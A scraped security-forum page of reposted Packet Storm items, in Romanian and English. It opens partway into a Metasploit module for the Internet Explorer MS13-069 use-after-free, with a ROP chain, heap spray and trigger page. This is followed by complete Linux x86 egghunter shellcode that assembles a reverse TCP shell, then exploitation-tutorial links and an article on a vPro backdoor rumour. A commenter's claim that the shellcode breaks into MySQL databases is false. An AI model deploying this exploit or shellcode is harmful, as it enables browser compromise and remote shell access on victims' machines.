msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") # This data should appear at the beginning of the target address (see TargetAddr in metadata) p = '' p << rand_text_alpha(225) # Padding to avoid null byte addr p << [t['TargetAddr']].pack("V*") # For mov ecx,dword ptr [eax] p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr) p << [t['Pivot']].pack("V*") # Stack pivot p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment p << rop # ROP chain p << payload.encoded # Actual payload return p end # # Notes: # * A custom spray is used (see function putPayload), because document.write() keeps freeing # our other sprays like js_property_spray or the heaplib + substring approach. This spray # seems unstable for Win 7, we'll have to invest more time on that. # * Object size = 0x30 # def get_html(t) js_payload_addr = ::Rex::Text.to_unescape([t['PayloadAddr']].pack("V*")) js_target_addr = ::Rex::Text.to_unescape([t['TargetAddr']].pack("V*")) js_pop_esp = ::Rex::Text.to_unescape([t['PopESP']].pack("V*")) js_payload = ::Rex::Text.to_unescape(get_payload(t)) js_rand_dword = ::Rex::Text.to_unescape(rand_text_alpha(4)) html = %Q|<!DOCTYPE html> <html> <head> <script> var freeReady = false; function getObject() { var obj = ''; for (i=0; i < 11; i++) { if (i==1) { obj += unescape("#{js_pop_esp}"); } else if (i==2) { obj += unescape("#{js_payload_addr}"); } else if (i==3) { obj += unescape("#{js_target_addr}"); } else { obj += unescape("#{js_rand_dword}"); } } obj += "\\u4545"; return obj; } function emptyAllocator(obj) { for (var i = 0; i < 40; i++) { var e = document.createElement('div'); e.className = obj; } } function spray(obj) { for (var i = 0; i < 50; i++) { var e = document.createElement('div'); e.className = obj; document.appendChild(e); } } function putPayload() { var p = unescape("#{js_payload}"); var block = unescape("#{js_rand_dword}"); while (block.length < 0x80000) block += block; block = p + block.substring(0, (0x80000-p.length-6)/2); for (var i = 0; i < 0x300; i++) { var e = document.createElement('div'); e.className = block; document.appendChild(e); } } function trigger() { if (freeReady) { var obj = getObject(); emptyAllocator(obj); document.write("#{rand_text_alpha(1)}"); spray(obj); putPayload(); } } window.onload = function() { document.body.contentEditable = 'true'; document.execCommand('InsertInputPassword'); document.body.innerHTML = '#{rand_text_alpha(1)}'; freeReady = true; } </script> </head> <body onbeforeeditfocus="trigger()"> </body> </html> | html.gsub(/^\x20\x20\x20\x20/, '') end def on_request_uri(cli, request) agent = request.headers['User-Agent'] t = get_target(agent) unless t print_error("Not a suitable target: #{agent}") send_not_found(cli) return end html = get_html(t) print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end end =begin In mshtml!CCaret::UpdateScreenCaret function: .text:63620F82 mov ecx, [eax] ; crash .text:63620F84 lea edx, [esp+110h+var_A4] .text:63620F88 push edx .text:63620F89 push eax .text:63620F8A call dword ptr [ecx+2Ch] =end Sursa: MS13-069 Microsoft Internet Explorer CCaret Use-After-Free ? Packet Storm
  17. Linux / x86 Multi-Egghunter Shellcode Authored by Ryan Fenno This is multi-egghunter Linux/x86 shellcode. /* Title: Multi-Egghunter Author: Ryan Fenno (@ryanfenno) Date: 20 September 2013 Tested on: Linux/x86 (Ubuntu 12.0.3) Description: This entry represents an extension of skape's sigaction(2) egghunting method [1] to multiple eggs. It is similar in spirit to BJ 'SkyLined' Wever's omelet shellcode for Win32 [2]. The proof-of-concept presented here splits a reverse TCP bind shell [3] into two parts. The egghunter is not only responsible for finding the two eggs, but also for executing them in the correct order. It is readily extendable to any (reasonable) number of eggs. References: [1] skape, "Safely Searching Process Virtual Address Space", www.hick.org/code/skape/papers/egghunt-shellcode.pdf [2] Wever, Berend-Jan, "w32-SEH-omelet-shellcode", http://code.google.com/p/w32-seh-omelet-shellcode/ [3] Willis, R. "reversetcpbindshell", http://shell-storm.org/shellcode/files/shellcode-849.php */ #include <stdio.h> #define MARKER "\x93\x51\x93\x59" #define TAG1 "\x01\x51\x93\x59" // easiest to use latter three bytes #define TAG2 "\x02\x51\x93\x59" // of MARKER for latter three of TAGs // first egg/tag/shellcode #define IPADDR "\xc0\xa8\x7a\x01" // 192.168.122.1 #define PORT "\xab\xcd" // 43981 unsigned char shellcode1[] = MARKER TAG1 //SHELLCODE1 "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80" "\x96\xb0\x66\xb3\x03\x68" IPADDR "\x66\x68" PORT "\x66" "\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80" // perform the jump "\x83\xc4\x20\x5f\x83\xec\x24\xff\xe7" ; /* global _start section .text _start: xor ebx, ebx mul ebx mov al, 0x66 ; socketcall() <linux/net.h> inc ebx ; socket() push edx ; arg3 :: protocol = 0 push ebx ; arg2 :: SOCK_STREAM = 1 push byte 0x2 ; arg1 :: AF_INET = 2 mov ecx, esp int 0x80 xchg eax, esi ; save clnt_sockfd in esi mov al, 0x66 ; socketcall() mov bl, 0x3 ; connect() ; build sockaddr_in struct (srv_addr) push dword 0x017AA8C0 ; IPv4 address 192.168.122.1 in hex (little endian) push word 0x697a ; TCP port 0x7a69 = 31337 push word 0x2 ; AF_INET = 2 mov ecx, esp ; pointer to sockaddr_in struct push dword 0x10 ; arg3 :: sizeof(struct sockaddr) = 16 [32-bits] push ecx ; arg2 :: pointer to sockaddr_in struct push esi ; arg1 :: clnt_sockfd mov ecx, esp int 0x80 ;---- perform the jump ; looking at the stack at this point, the target for the jump ; is at $esp+0x20, so... add esp, 0x20 pop edi sub esp, 0x24 jmp edi */ // second egg/tag/shellcode unsigned char shellcode2[] = MARKER TAG2 //SHELLCODE2 "\x5b\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89" "\xe2\x53\x89\xe1\xcd\x80" ; /* global _start section .text _start: pop ebx ; arg1 :: clnt_sockfd push 0x2 pop ecx ; loop from 2 to 0 dup2loop: mov byte al, 0x3F ; dup2(2) int 0x80 dec ecx jns dup2loop ; loop ends when ecx == -1 xor eax, eax mov byte al, 0x0B ; execve(2) push edx ; null terminator push 0x68732f2f ; "hs//" push 0x6e69622f ; "nib/" mov ebx, esp ; arg1 :: "/bin/sh\0" push edx ; null terminator mov edx, esp ; arg3 :: envp = NULL array push ebx mov ecx, esp ; arg2 :: argv array (ptr to string) int 0x80 */ unsigned char egghunter[] = "\x6a\x02\x59\x57\x51\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43" "\x58\xcd\x80\x3c\xf2\x74\xf1\xb8" MARKER "\x89\xcf\xaf" "\x75\xec\x89\xcb\x59\x20\xc8\xaf\x51\x89\xd9\x75\xe1\x59\xe2" "\xd5\xff\xe7"; /* global _start section .text _start: push byte 0x2 pop ecx ; number of eggs eggLoop: push edi ; memory location of ecx-th piece; first of ; these is meaningless push ecx ; save counter xor ecx, ecx ; initialize ecx for memory search fillOnes: or cx, 0xfff shiftUp: inc ecx push byte 0x43 ; sigaction(2) pop eax int 0x80 cmp al, 0xf2 jz fillOnes mov eax, 0x59935193 ; marker mov edi, ecx scasd ; advances edi by 0x4 if there is a match; ; assumes direction flag (DF) is not set jnz shiftUp mov ebx, ecx ; save off ecx in case we need to keep looking pop ecx ; restore counter and al, cl ; tag in eax scasd push ecx mov ecx, ebx jnz shiftUp pop ecx loop eggLoop jmp edi */ void main() { printf("egghunter length: %d\n", sizeof(egghunter)-1); printf("shellcode1 length: %d\n", sizeof(shellcode1)-1); printf("shellcode2 length: %d\n", sizeof(shellcode2)-1); ((int(*)())egghunter)(); } Sursa: Linux / x86 Multi-Egghunter Shellcode ? Packet Storm L-am postat deoarece e bine documentat. Pentru cei care nu stiu ce e un shellcode, puteti folosi codul de mai sus pentru a obtine acces la bazele de date MySQL ale unor site-uri vulnerabile la MyShellcode Injection. ( )
  18. PC disable can be triggered locally or remotely—an Internet or LAN connection is not necessary—under the following circumstances: - Excessive end-user attempts to log into the system. - The laptop misses its rendezvous time with the server (electronic check-in over the Internet), thereby issuing a local poison pill. • The IT administrator can send a poison pill remotely to the stolen laptop across the Internet, intranet, or Short Messaging Service (SMS)
  19. Return-Oriented-Programming Authored by Saif El-Sherei Whitepaper called Return-Oriented-Programming (ROP FTW). Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/return-oriented-programming.pdf
  20. Ai dreptate, dar cum functioneaza anti-theft-ul de pe Intel-uri? E o idee, greu de demonstrat, nu trebuie sa o credem, dar trebuie sa o luam in considerare si sa ne gandim ca asa ceva, cu certitudine, e posibil.
  21. Format String Exploitation Tutorial Authored by Saif El-Sherei This is a brief whitepaper tutorial that discusses format string exploitation. Download: http://packetstormsecurity.com/files/download/123363/formatstring-tutorial.pdf
  22. Off-By-One Exploitation Tutorial Authored by Saif El-Sherei This whitepaper is called Off-By-One Exploitation Tutorial. The off by one vulnerability in general means that if an attacker supplied input with certain length if the program has an incorrect length condition the program will write one byte outside the bounds of the space allocated to hold this input causing one of two scenarios depending on the input. Download: http://packetstormsecurity.com/files/download/123361/offbyone-tutorial.pdf
  23. Stack Based Buffer Overflow Exploitation Tutorial Authored by Saif El-Sherei This is a brief whitepaper tutorial discussing stack-based buffer overflow exploitation. Download: http://packetstorm.igor.onlinedirect.bg/papers/general/stackbo-tutorial.pdf
  24. nteger overflow/underflow exploitation tutorial By Saif El Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend once said “ you think you understand something until you try to teach it “. This is my first try at writing papers. This paper is my understanding of the subject. I understand it might not be complete I am open for suggestions and modifications. I hope as this project helps others as it helped me. This paper is purely for education purposes. Note: the Exploitation methods explained in the below tutorial will not work on modern system due to NX, ASLR, and modern kernel security mechanisms. If we continue this series we will have a tutorial on bypassing some of these controls What is an integer? An integer in computing is a variable holding a real number without fractions. The size of int is depending on the architecture. So on i386 arch (32-bit) the int is 32-bits. An integer is represented in memory in binary. Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
  25. 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs Tinfoil hat brigade say every PC is on mobile networks, even when powered down By Richard Chirgwin, 23rd September 2013 Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating an zero-power-consumption on-chip 3G communications platform as an NSA backdoor. The scoop comes courtesy of tinfoil socialist site Popular Resistance, in this piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes: “The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has it’s own operating system embedded on the chip itself. As long as the power supply is available and and in working condition, it can be woken up by the Core vPro processor, which runs on the system’s phantom power and is able to quietly turn individual hardware components on and access anything on them.” A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda. Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried on its chips apparently extends wake-on-LAN to wake-on-mobile: “Core vPro processors work in conjunction with Intel’s new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there,” he writes, “anti theft 3.0 always has that 3G connection on also, even if the computer is turned off” (emphasis added). No evidence is offered for the assertions detailed above. And with that, El Reg will now happily open the floor to the commentards … ® Sursa: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register
×
×
  • Create New...